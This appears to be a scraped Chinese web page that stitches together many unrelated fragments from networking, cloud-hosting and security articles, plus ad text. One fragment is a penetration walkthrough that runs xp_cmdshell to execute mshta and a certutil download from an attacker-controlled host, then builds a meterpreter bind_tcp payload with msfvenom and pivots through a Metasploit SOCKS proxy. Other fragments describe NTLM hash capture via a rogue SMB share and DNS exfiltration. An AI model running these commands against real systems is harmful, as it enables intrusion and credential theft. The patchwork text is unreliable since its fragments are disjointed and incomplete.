在在Windows 系统中,在“我的电脑”上右击“管理”,依次选择“系统工具→共享文件夹→共享”,就会看到一些带有美元“$”标记的符号就是Windows系统默认共享,也就是Windows在安装完毕后自动共享的功能。
众所周知,Windows系统有着种种安全漏洞和不足,这些都要依靠微软发布的一个个补丁来弥补,但公司内网无法访问Internet,,不能及时地下载更新。补丁的分发是微软应尽的责任,所以他们开发了Windows Server Update Services(简称WSUS)这一软件,可以实现通过一台服务器下载更新后,通过内部网络分发补丁。
在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。EW是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可以在复杂的网络环境下完成网络穿透。
最近用VPC一直用的很爽,用来调试安装包,实在太好用了。但是,最近却遇到一个问题,FTP总是无法正常工作,经过漫长而痛苦的跟踪定位,找到原因: 40:47.587状态:与主机通讯时出现了错误 200 Type set to I. 500 Invalid PORT Command. 500 'LPRT 6,16,0,0,0,0,0,0,0,0,120,79,22,0,60,0,0,0,2,4,14': command not understood 在vpc的命令行下用了一下ftp,果然:
大家好,又见面了,我是你们的朋友全栈君。架设一台FTP服务器其实很简单。首先,要保证你的机器能上网,而且有不低于ADSL 512Kbps的网络速度。其次,硬件性能要能满足你的需要。最后,需要安装FTP服务器端的软件,这类软件很多,可以使用微软的IIS(Internet Information Server 因特网信息服务系统),也可以使用专业软件。不同的软件提供的功能不同,适应的需求和操作系统也不同。一般来说,系统最低要求如下:
Over the mountains,mountains.我翻山越岭,才发现无人等候。这个靶场是红日安全团队的一个靶场项目~非常好,方便了我这类懒得搭建域(不会)的人。
互联网环境鱼龙混杂,网站被攻击是常见现象,所以了解一些常见的网站攻击手段十分必要。下面列举比较常见的 4 种攻击手段:
利用代理工具将内网的流量代理到本地进行访问,这样就可以对内网进行下一步渗透,同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议),工作在OSI参考模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本:
本文研究的主要是入域的Windows访问未入域的Samba服务的问题,具体介绍 如下。
一般情况下,http 500内部服务器(HTTP-Internal Server Error)错误说明IIS服务器无法解析ASP代码,访问一个静态页面试试是否也出现这个问题。
如果我们能强制SQL服务器连接到我们控制的SMB共享,连接将会包含认证数据。更具体的来说,将会发起一个NTLM认证,我们将能捕获到运行SQL服务的账户的密码hash。然后我们可以尝试破解这个hash,或者进行hash转发攻击。
Domain:域是计算机网络的一种形式,其中所有用户账户,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。
之前在子域中子域中发现存在10.12.10.0/24网段,通过nbtscan发现存在10.12.10.3这台主机
首先,在资产某处发现存在SQL注入,数据库类型是SQLServer,并且当前用户为sa管理用户。
Linked SQL server是一个SQL Server数据库中的对象,它可以连接到另一个SQL Server或非SQL Server数据源(如Oracle,MySQL,PostgreSQL等),并且可以使用该数据源中的表和视图。通过使用Linked server,用户可以在单个查询中访问多个数据源中的数据,而无需将数据导入到本地数据库中。
如果您需要使用创建的云服务器搭建一个对外展示的网站或者Web应用程序,请按以下步骤进行相关的配置操作。建站参考如果您使用的是公共镜像创建的云服务器,那么购买完成后可以参考以下建站指导完成完网站或应用程序的搭建。搭建WordPress博客平台,请参考部署WordPress博客系统搭建Discuz论坛平台,请参考搭建Discuz 论坛网站。更
SQLRecon是一款针对Microsoft SQL Server的安全研究工具,该工具专为红队研究人员设计,可以帮助广大研究人员针对MSSQL执行网络侦查和后渗透利用测试。
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta' 注意事项: 添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。 思路拓展: bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。 EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe' 0x04 Socks代理 + Proxychains 我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。 run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功? proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433 确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。 msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe 另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。 流量走向:
52:在NTFS文件夹中,可以为用户配置( 6 )种标准权限;在NTFS文件中可以为用户配置( 5 )种标准权限。
本篇文章是MSSQL数据库漏洞提权复现记录,记录了实际中常见的MSSQL数据库漏洞并如何利用,对漏洞底层的原理简单分析,主要分为五个部分:MSSQL简介、MSSQL各版本安装、MSSQL基本操作、MSSQL漏洞复现提权和自建内网环境实战。 本篇文章由浅入深地介绍了系统存储过程控制不当导致提权如sp_oacreate和sp_oamethod、扩展存储过程使用不当提权如xp_cmdshell和xp_regwrite、沙盒提权及映像劫持。在学习MSSQL过程中也阅读了几十篇中英文MSSQL相关技术文章,最终按照作
WMI 全称为:Microsoft Windows Management Instrumentation (WMI)
有时候我们购买腾讯云服务器轻量应用服务器无忧计划_轻量应用服务器续费同价-腾讯云 (tencent.com)
趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没有什么动态功能
1.最基本,最常用的,测试物理网络的 ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
此时电脑上网正常,常规的判断方法,肯定是ping一下文件服务器,但是以我的经验,马上就想到肯定是DNS问题,没必要ping服务器来检查问题了,就算查了,肯定是ping名称不通,ping IP就没问题,直接以IP地址的形式访问文件服务器,肯定也是没问题的,这基本上不需要验证,也不是我想要的方式。
虚拟机中的系统为CentOS,充当服务器,但是开启Tomcat后,在宿主机Mac中无法访问,显示请求被拒接,如下:
我们需要具有 ACL 写入权限才能为目标用户设置 UserAccountControl 标志,请参阅上文以识别有趣的 ACL。使用 PowerView:
如果你的服务器是2003的,它默认只支持.net,不支持asp所以须进行以下操作:
时下越来越多的公司为了所谓“提高员工工作效率”,对登陆QQ做出了限制。虽然禁用QQ在一定程度上有利于公司管理,但此举并不能够得人心。如果你也正在因为公司禁止登陆QQ而不知所措,不妨看看reizhi准备的突破QQ封锁的方案。另外需要提到的是WEB QQ,如果你所在的公司没有屏蔽web.qq.com或者w.qq.com的话,直接使用WEB QQ会方便得多。教程轻度折腾,现在开始。
DNS(Domain Name System: 域名系统):它是一项互联网服务,储存域名和IP地址相互映射关系的一个分布式数据库,它能够使人更方便地访问互联网。
windows XP cmd命令大全 一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是
5月3日 OAuth与OpenID登录工具曝出重大漏洞 4月28日 新网某VPS用户信息泄露影响千余用户安全 4月28日 IE浏览器发现大规模钓鱼漏洞,可获得用户系统控制权限 4月25日 DNSPod受邀参展北京QCon大会 4月22日 DNSPod为小米新域名mi.com提供域名解析服务 4月19日 黑客可利用“心脏流血”漏洞绕过VPN认证 4月18日 快播关闭qvod服务器原因调查:或受净网2014行动影响 4月8日 Windows XP将正式退役,微软将停止服务支持 4月8日 OpenSSL被爆出现漏
前几天看到了老外一篇讲 mimikatz 防御的文章,感觉行文思路还不错,但是内容稍有不足,国内也有一篇翻译,但是只是照着错误翻译的,所以就萌生了把那篇优秀文章,翻译复现,并加入其它一些内容,本文只是抛砖引玉,文中有错误的话,欢迎吐槽。
基础词汇解释: DnsA记录传输: 利用dns解析过程,在请求解析的域名中包含需外传的数据,如xxxxxx.hack.com。则最终hack.com的dns服务器会收到xxxxx这个数据回传。 dns的txt类型回包: 一般指为某个主机名或域名设置的说明,可被黑客利用回传数据。终端请求某恶意域名的dns解析,dns返回txt记录,包含黑客需要的回传内容,如模块更新数据、指令等 概述: 随着越来越多的公司安全意识提高,大量公司已封锁socket通信,仅允许员工通过http/https协议外网,同时采取了越来越
今天,在访问一个网站的时候,我想看看它的ip是多少,就在windows 命令行下去ping了下该网站/主机;ip地址是解析出来了,但是却发现请求超时,没有ping通,当时我就很困惑。然后,我又tracert 该 ip 跟踪了一下 想看看到底什么问题,最后我发现,当跟踪到该 ip的时候 请求被拒绝了。突然之间,应该是服务端 设置了相关策略对网络层icmp 回显请求报文进行了限制;而访问网页用的是 http 协议,因此会出现此现象 。
在使用 jekins 打包的时候,在同一个局域网内可以访问 jekins 的地址来新增项目、打包、配置等等各种操作,但是如果打包机的IP不是固定的,那么在每次其IP改动的时候,我们都无法访问其地址,如果多个项目都在使用这个 jekins 打包的话,那么所有人都访问不到,这样是相当尴尬的事情。所以静态IP是必须滴。
搭建过程 Hyper-V 是自Windows Server2008 以来提供的虚拟机管理软件,它操作简便,功能也不错,可以方便的在它里面安装各种操作系统,如图所示: 现在,想利用这几台虚拟服务器搭建一
JavaScript是一种属于网络的高级脚本语言,已经被广泛用于Web应用开发,常用来为网页添加各式各样的动态功能,为用户提供更流畅美观的浏览效果。通常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。
Windows 提供了一系列的认证类型,包括 Basic、Kerberos、Negotiate、Certificate、CredSSP、NTLM、Digest等。这些认证类型在不同的应用场景中起到关键作用,也在某种程度上相互关联。本文将详细介绍这些认证类型,以及他们的使用场景和关系。
1.在服务器上创建一个用户名和口令,和客户端登陆的用户名和口令一致的; 2.通过网上邻居访问服务器,如果没有提示输入用户和密码,那么网络没问题; 3.看COM+和DTC服务有没有设置好; 4.是XP sp3系统或Home系统的话,可能不稳定; 5.再者看感染病毒没有。 。
在Windows XP中,我们可以通过“事件查看器”的事件日志服务查看计算机的开、关机时间。因为事件日志服务会随计算机一起启动和关闭,并在事件日志中留下记录。
注:目前场面上大多数CDN服务商都提供了云WAF的配置选项,内置了多种安全防护策略,可对SQL注入、XSS跨站、Webshell上传、后门隔离保护、命令注入、恶意扫描等攻击行为进行有效拦截。
cn0sec 基础渗透笔记,内网学习笔记,工具学习笔记 2020-03-05
NGINX Web服务器可以充当功能非常强大的软件负载平衡器,此外还有更传统的角色,通过HTTP使用FastCGI处理程序为脚本提供静态内容和动态内容。因为NGINX使用非线程,事件驱动的架构,所以它能够胜过像Apache这样的Web服务器。在接收重负载的部署中尤其如此。
域名系统(英文:Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。
域是Windows网络操作系统的应用模型。域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即TrustRelation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。
BIND(Berkeley internet Name Daemon)也叫做NAMED,是现今互联网上使用最为广泛的DNS 服务器程序。这篇文章将要讲述如何在 chroot 监牢中运行 BIND,这样它就无法访问文件系统中除“监牢”以外的其它部分。
这篇文章是关于我在 HackerOne 上的一个私人程序上的发现之一。由于这是一个私人程序,因此我进行了某些修改以防止泄露任何敏感信息。
私有域解析 Private DNS 是基于腾讯云私有网络 VPC (Virtual Private Cloud)环境的私有域名解析管理服务。通过它,您可以在自定义的一个或多个私有网络中快速构建DNS系统,并能够方便地使用私有域名记录来管理 VPC 关联的 CVM、CLB、CDN、COS 等腾讯云自有资源,而这些私有域名在 VPC 之外将无法访问— 好消息,特大好消息~ 私有域解析Private DNS 套餐包 正式上线啦! 先来看看 私有域解析Private DNS 原先是怎么收费的 按私有域
领取专属 10元无门槛券
手把手带您无忧上云